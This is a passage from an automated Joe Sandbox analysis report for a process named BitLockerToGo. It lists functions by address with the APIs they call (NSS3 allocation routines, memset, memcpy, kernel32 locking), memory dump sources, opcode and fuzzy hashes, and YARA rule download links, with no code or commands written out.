                                                                                                                                                                                                                                                                                                                    • Opcode ID: bc445581b33ce217210782c50fe0e09514df44c5561c64a5dd82ba4c49593ab9
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 95492da4578668f92605e8f1a885447fda78687e7650af457922b94d4a70a32a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc445581b33ce217210782c50fe0e09514df44c5561c64a5dd82ba4c49593ab9
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B62DE7260E3858FD721CF18C09076ABBF6AF86318F184A4DE4D54BB91D335D985CBA2
                                                                                                                                                                                                                                                                                                                    Function 6CBACDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBAD086
                                                                                                                                                                                                                                                                                                                    • PR_Malloc.NSS3(00000001), ref: 6CBAD0B9
                                                                                                                                                                                                                                                                                                                    • PR_Free.NSS3(?), ref: 6CBAD138
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FreeMallocstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: >
                                                                                                                                                                                                                                                                                                                    • API String ID: 1782319670-325317158
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5d99d8fdda0e9dcc582e8fbed4aaf8e9eb370d3b0cc44404d065e460dbbeb600
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DD15D62B8D6C60BEB2448FD9C713E97793C742374F584325D9E18BBE5E61A8847C342
                                                                                                                                                                                                                                                                                                                    Function 6C9E545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9E8A4B
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f54d901c1828ca8d55d3362d71ee8b69df1917757486dd1ae5a640b459d9a38
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85B1D772A0021ACFDB15CF68CC907E9B7B6EFA9314F1902A9C549DB791E730D985CB90
                                                                                                                                                                                                                                                                                                                    Function 6C9E542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?), ref: 6C9E88F0
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9E925C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2221118986-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                                    • Instruction ID: faa7d6d1f069d4b820c8269f46dde8780aefd84ceb15e1269bd44b8289cb7d8b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B1C772E0011ACBDB15CF58C8816EDB7B6EFA9314F190269C949DB785E730E989CB90
                                                                                                                                                                                                                                                                                                                    Function 6CB4AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d36a1d916dfe9678930b5691708e931e714273ecb695b63b5321fd2e39b7e4e0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 546217773ec9e9c37b0471219156f432d64eb4200269951d402152699bb7e784
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d36a1d916dfe9678930b5691708e931e714273ecb695b63b5321fd2e39b7e4e0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CF101B1E055A68BDB04CF68D8417AD77F8EB8E748F19822DC911D7B48E7709941CBC1
                                                                                                                                                                                                                                                                                                                    Function 6C9B6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C9B6D45
                                                                                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9B6E1E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4169067295-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 00a1a75021d96f7f873547c187aa9244019cf69dc4cc5a55c191fb1269b2da63
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 363bad5e3347d7bff1d3b01f9f18a7220a1351717426fcb81944a0502025e24a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00a1a75021d96f7f873547c187aa9244019cf69dc4cc5a55c191fb1269b2da63
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FA17B706183819FD718CF24C4907ABBBE6BFA8308F04491DE48A97751DB70F859CB92
                                                                                                                                                                                                                                                                                                                    Function 6C9D85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9f7cd4b1eb856f7a1f0010bf87cddf53f8323b4d4d09b6c47c997f53d0614176
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52329F31F005198BDF1CCE9DC8A17BEB7B6FB88310F56912AD406BB791CA34AD418B95
                                                                                                                                                                                                                                                                                                                    Function 6CB00E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CB01052
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CB01086
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1297977491-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d3ef41b9abfa1c6550f8155cc3b9b15f3fac730410ea5072bca808efd6f25eb4
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3c4c95d29a49031a5df77b4009b744ab52ace3db7df25b48a6f7004bafe49797
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ef41b9abfa1c6550f8155cc3b9b15f3fac730410ea5072bca808efd6f25eb4
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00A12C71F0128A9FDF08CF99D990AEEBBB6FF48314B148129E915A7700D735AC11CB90
                                                                                                                                                                                                                                                                                                                    Function 6CA2AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3432436631
                                                                                                                                                                                                                                                                                                                    • Opcode ID: aa0a46008aacddf272261fb8a8480540d887bd6fde19a9e43dcc17c44868768e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 048d5ac88bbafe43372843ebe6a88525775d367de5c506289f9df64ffd2f3f65
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa0a46008aacddf272261fb8a8480540d887bd6fde19a9e43dcc17c44868768e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B716B706082509FDB04CF28E894AAABBF5FF89314F18C619F95997341D730A986CBD5
                                                                                                                                                                                                                                                                                                                    Function 6CAEED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CAEEE3D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_ArenaUtil
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2062749931-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 069f7d3985b058226e86b9ca6c77badf544891672b6363254df5b4403a050318
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E971D272E017018FD718CF59D8806AAB7F2EB8C314F19862DD85697B91D730E980DBD1
                                                                                                                                                                                                                                                                                                                    Function 6C9B5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • memcmp.VCRUNTIME140(?,?,6C984A63,?,?), ref: 6C9B5F06
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1475443563-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3f9b84d642bf0feeb07b7e05041c62d445ca763a4520d074481a95d826f94bb0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ab7921ce70af380c7e2b471b2340586f2fd6c334f518e25e046aa9877d45588b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f9b84d642bf0feeb07b7e05041c62d445ca763a4520d074481a95d826f94bb0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EC1AF75E01209ABCB04CF95C5906EEFBB6FF8A318F28425DD8557BB45D732A806CB90
                                                                                                                                                                                                                                                                                                                    Function 6CA24DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: winUnlockReadLock
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4244601998
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ce8fa48bef79e1a805c3328595128ba9adc53febf3e61d5a5cb738a83879ee8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ff2ba186647e7cf97fe513690307457110ae352a43e7574517fd456fd1b76c57
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ce8fa48bef79e1a805c3328595128ba9adc53febf3e61d5a5cb738a83879ee8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E13770A083808FDB44DF28E58465ABBF0FF89748F198A1DE89997351E734D985CF86
                                                                                                                                                                                                                                                                                                                    Function 6C9A0512 Relevance: .5, Instructions: 466COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dd002deb7c4bb720e901b6777861c564866c4292dc6fdb8ab7ff55671b68bba1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8220771E04669CFDB14CF98C890AADF7B6FF89308F548199D44AA7705D731A986CF80
                                                                                                                                                                                                                                                                                                                    Function 6C9EAC00 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 16b19db587d712627a1d5f7c4aba2f4f1ba577eb39f4dd62fc827e74f492de22
                                                                                                                                                                                                                                                                                                                    • Instruction ID: da33c61c4693a9e97d70c1e900081f648f74a4f594c78513f56557434f42d12c
